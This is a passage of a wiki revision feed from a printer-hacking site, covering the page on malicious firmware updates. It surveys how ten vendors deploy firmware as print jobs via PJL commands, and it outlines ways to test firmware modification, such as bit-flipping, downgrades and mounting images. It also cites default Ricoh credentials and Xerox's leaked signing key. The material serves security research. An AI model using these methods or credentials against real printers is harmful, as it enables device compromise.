Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension &amp;lt;code&amp;gt;.djf&amp;lt;/code&amp;gt; and contain &amp;lt;code&amp;gt;@PJL EXECUTE BRDOWNLOAD&amp;lt;/code&amp;gt;, while 9 &amp;lt;code&amp;gt;.blf&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=PCL&amp;lt;/code&amp;gt;. Brother has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Lexmark ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 &amp;lt;code&amp;gt;.fls&amp;lt;/code&amp;gt; files could be obtained containing the PJL header &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ &amp;lt;ref&amp;gt;''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Samsung ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files starting with &amp;lt;code&amp;gt;@PJL FIRMWARE&amp;lt;/code&amp;gt; and associated &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL DEFAULT SWUPGRADE=ON&amp;lt;/code&amp;gt; could be obtained. Samsung has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Xerox ===&lt;br /&gt;
&lt;br /&gt;
Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files including &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 36 PostScript files for older devices and 35 &amp;lt;code&amp;gt;.dlm&amp;lt;/code&amp;gt; files, which is the format currently used by Xerox and includes digital signatures. A flaw in the deployment process, however, was found by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;/&amp;gt; and extended by &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;/&amp;gt;, leading to remote code execution – the private key and the tool used for code signing were contained in the firmware itself.&lt;br /&gt;
&lt;br /&gt;
=== Ricoh ===&lt;br /&gt;
&lt;br /&gt;
The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (&amp;lt;code&amp;gt;site:support.ricoh.com firmware&amp;lt;/code&amp;gt;). Files can be unpacked using ''unp''. 14 &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL RSYSTEMUPDATE SIZE=…&amp;lt;/code&amp;gt; while 15 &amp;lt;code&amp;gt;.brn&amp;lt;/code&amp;gt; files are associated with a &amp;lt;code&amp;gt;settings.ini&amp;lt;/code&amp;gt;, including &amp;lt;code&amp;gt;@PJL FWDOWNLOAD&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;USERID=sysadm, PASSWORD=sysadm&amp;lt;/code&amp;gt;. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ &amp;lt;ref&amp;gt;''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Kyocera ===&lt;br /&gt;
&lt;br /&gt;
Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''&amp;lt;ref&amp;gt;''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan&amp;lt;/ref&amp;gt; and ''squashfs''&amp;lt;ref&amp;gt;''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher&amp;lt;/ref&amp;gt; images as well as proprietary binary formats. Firmware is deployed as a print job with &amp;lt;code&amp;gt;!R! UPGR'SYS';EXIT;&amp;lt;/code&amp;gt; prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language &amp;lt;ref&amp;gt;''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19&amp;lt;/ref&amp;gt;. Kyocera has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Konica ===&lt;br /&gt;
&lt;br /&gt;
Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=FIRMUPDATE&amp;lt;/code&amp;gt;. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ &amp;lt;ref&amp;gt;''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26&amp;lt;/ref&amp;gt;. It may be doubted that such a scheme is cryptographically secure.&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures, which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue, however, is hard, as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Vendor !! Extension !! Quantity !! File header or type&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | HP&lt;br /&gt;
| rfu            || 419  || @PJL UPGRADE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| bdl            || 206  || FutureSmart binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Epson&lt;br /&gt;
| rcx            ||  49  || SEIKO EPSON EpsonNet Form&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||   9  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   7  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | Dell&lt;br /&gt;
| fls, fly       ||  30  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||  25  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  18  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   3  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||   2  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   1  || @PJL ENTER LANGUAGE=FLASH&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Brother&lt;br /&gt;
| djf            ||  79  || @PJL EXECUTE BRDOWNLOAD&lt;br /&gt;
|-&lt;br /&gt;
| blf            ||   9  || @PJL ENTER LANGUAGE=PCL&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Lexmark&lt;br /&gt;
| fls            ||  63  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin, fls       ||   6  || Unknown binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Samsung&lt;br /&gt;
| hd             ||  33  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd0       ||   4  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | Xerox&lt;br /&gt;
| ps             ||  36  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| dlm            ||  35  || Xerox Dynamic Loadable Module&lt;br /&gt;
|-&lt;br /&gt;
| prn, bin       ||  20  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  16  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||  10  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  10  || @PJL SET JOBATTR=&amp;quot;@SWDL&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd, hde   ||   8  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, xfc       ||   4  || @PJL ENTER LANGUAGE=XFLASH&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   3  || @PJL FSDOWNLOAD [name].rpm&lt;br /&gt;
|-&lt;br /&gt;
| axf            ||   3  || RISC OS AIF executable&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Ricoh&lt;br /&gt;
| brn            ||  15  || @PJL FWDOWNLOAD…&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  14  || @PJL RSYSTEMUPDATE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| fls            ||   4  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Kyocera&lt;br /&gt;
| cramfs, img    ||  98  || cramfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, squashfs  ||  79  || squashfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, kmmfp     ||  41  || u-boot legacy uImage&lt;br /&gt;
|-&lt;br /&gt;
| efi, kmpanel   ||  13  || proprietary image format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Konica Minolta&lt;br /&gt;
| bin            ||  38  || unknown binary, additional checksum file&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||  20  || PostScript (title: ''Softload printer modules'')&lt;br /&gt;
|-&lt;br /&gt;
| ftp, prn       ||  11  || @PJL ENTER LANGUAGE=FIRMUPDATE&lt;br /&gt;
|-&lt;br /&gt;
| upg            ||   1  || @PJL ENTER LANGUAGE=UPGRADE&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.&lt;br /&gt;
&lt;br /&gt;
''Other attack scenarios include:''&lt;br /&gt;
&lt;br /&gt;
* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses.&lt;br /&gt;
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easily mountable).&lt;br /&gt;
* Just because firmware is signed doesn't mean it's secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=319</id>
		<title>Firmware updates</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=319"/>
				<updated>2017-01-31T08:56:33Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Canon */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The dangers of malicious firmware updates are well-known and have been discussed early by &amp;lt;ref&amp;gt;''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412&amp;lt;/ref&amp;gt; and &amp;lt;ref&amp;gt;''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006&amp;lt;/ref&amp;gt;. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.&lt;br /&gt;
&lt;br /&gt;
Firmware modification attacks against network printers have been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;&amp;gt;''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011&amp;lt;/ref&amp;gt; for HP devices, by &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;&amp;gt;''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014&amp;lt;/ref&amp;gt; for the Canon PIXMA series and by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;&amp;gt;''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011&amp;lt;/ref&amp;gt; and &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;&amp;gt;''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016&amp;lt;/ref&amp;gt; for various Xerox models. As a countermeasure, printer manufacturers started to digitally sign their firmware &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Vendors ==&lt;br /&gt;
&lt;br /&gt;
To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by &amp;lt;ref&amp;gt;''Exploiting Network Printers'', J. Müller, 2016, p. 56-58&amp;lt;/ref&amp;gt;. The results are as follows.&lt;br /&gt;
&lt;br /&gt;
=== HP ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (&amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt;) format and 206 newer ‘HP FutureSmart’ binaries (&amp;lt;code&amp;gt;.bdl&amp;lt;/code&amp;gt;) can be retrieved. The &amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt; files contain proprietary PJL commands like &amp;lt;code&amp;gt;@PJL UPGRADE SIZE=…&amp;lt;/code&amp;gt;, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;/&amp;gt; and caused HP to digitally sign all their printer firmware since March 2012 &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;/&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Canon ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;/&amp;gt;, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.&lt;br /&gt;
&lt;br /&gt;
=== Epson ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting &amp;lt;code&amp;gt;.exe&amp;lt;/code&amp;gt; files and can be unpacked using ''unp''&amp;lt;ref&amp;gt;''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath&amp;lt;/ref&amp;gt;. The contained &amp;lt;code&amp;gt;.efu&amp;lt;/code&amp;gt; files can be analyzed using ''Binwalk''&amp;lt;ref&amp;gt;''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner&amp;lt;/ref&amp;gt; which extracts the actual firmware. One can obtain 49 &amp;lt;code&amp;gt;.rcx&amp;lt;/code&amp;gt; files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing PJL commands (&amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt;). Epson has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Dell ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included &amp;lt;code&amp;gt;.zip&amp;lt;/code&amp;gt; files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 25 &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt; and 30 &amp;lt;code&amp;gt;.fls&amp;lt;/code&amp;gt;/&amp;lt;code&amp;gt;.fly&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; were found. Regarding protection mechanisms, Dell has not released any publicly available information.&lt;br /&gt;
&lt;br /&gt;
=== Brother ===&lt;br /&gt;
&lt;br /&gt;
Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension &amp;lt;code&amp;gt;.djf&amp;lt;/code&amp;gt; and contain &amp;lt;code&amp;gt;@PJL EXECUTE BRDOWNLOAD&amp;lt;/code&amp;gt; while nine &amp;lt;code&amp;gt;.blf&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=PCL&amp;lt;/code&amp;gt;. Brother has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Lexmark ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 &amp;lt;code&amp;gt;fls&amp;lt;/code&amp;gt; files could be obtained containing the PJL header &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ &amp;lt;ref&amp;gt;''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Samsung ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files starting with &amp;lt;code&amp;gt;@PJL FIRMWARE&amp;lt;/code&amp;gt; and associated &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL DEFAULT SWUPGRADE=ON&amp;lt;/code&amp;gt; could be obtained. Samsung has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Xerox ===&lt;br /&gt;
&lt;br /&gt;
Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files including &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 36 PostScript files for older devices and 35 &amp;lt;code&amp;gt;.dlm&amp;lt;/code&amp;gt; files, which is the format currently used by Xerox and includes digital signatures. A flaw in the deployment process, however, was found by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;/&amp;gt; and extended by &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;/&amp;gt;, leading to remote code execution – the private key and the tool used for code signing were contained in the firmware itself.&lt;br /&gt;
&lt;br /&gt;
=== Ricoh ===&lt;br /&gt;
&lt;br /&gt;
The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (&amp;lt;code&amp;gt;site:support.ricoh.com firmware&amp;lt;/code&amp;gt;). Files can be unpacked using ''unp''. 14 &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL RSYSTEMUPDATE SIZE=…&amp;lt;/code&amp;gt; while 15 &amp;lt;code&amp;gt;.brn&amp;lt;/code&amp;gt; files are associated with a &amp;lt;code&amp;gt;settings.ini&amp;lt;/code&amp;gt;, including &amp;lt;code&amp;gt;@PJL FWDOWNLOAD&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;USERID=sysadm, PASSWORD=sysadm&amp;lt;/code&amp;gt;. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ &amp;lt;ref&amp;gt;''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Kyocera ===&lt;br /&gt;
&lt;br /&gt;
Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''&amp;lt;ref&amp;gt;''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan&amp;lt;/ref&amp;gt; and ''squashfs''&amp;lt;ref&amp;gt;''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher&amp;lt;/ref&amp;gt; images as well as proprietary binary formats. Firmware is deployed as a print job with &amp;lt;code&amp;gt;!R! UPGR'SYS';EXIT;&amp;lt;/code&amp;gt; prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language &amp;lt;ref&amp;gt;''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19&amp;lt;/ref&amp;gt;. Kyocera has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Konica ===&lt;br /&gt;
&lt;br /&gt;
Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=FIRMUPDATE&amp;lt;/code&amp;gt;. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ &amp;lt;ref&amp;gt;''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26&amp;lt;/ref&amp;gt;. It may be doubted that such a scheme is cryptographically secure.&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures, which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue, however, is hard, as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Vendor !! Extension !! Quantity !! File header or type&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | HP&lt;br /&gt;
| rfu            || 419  || @PJL UPGRADE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| bdl            || 206  || FutureSmart binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Epson&lt;br /&gt;
| rcx            ||  49  || SEIKO EPSON EpsonNet Form&lt;br /&gt;
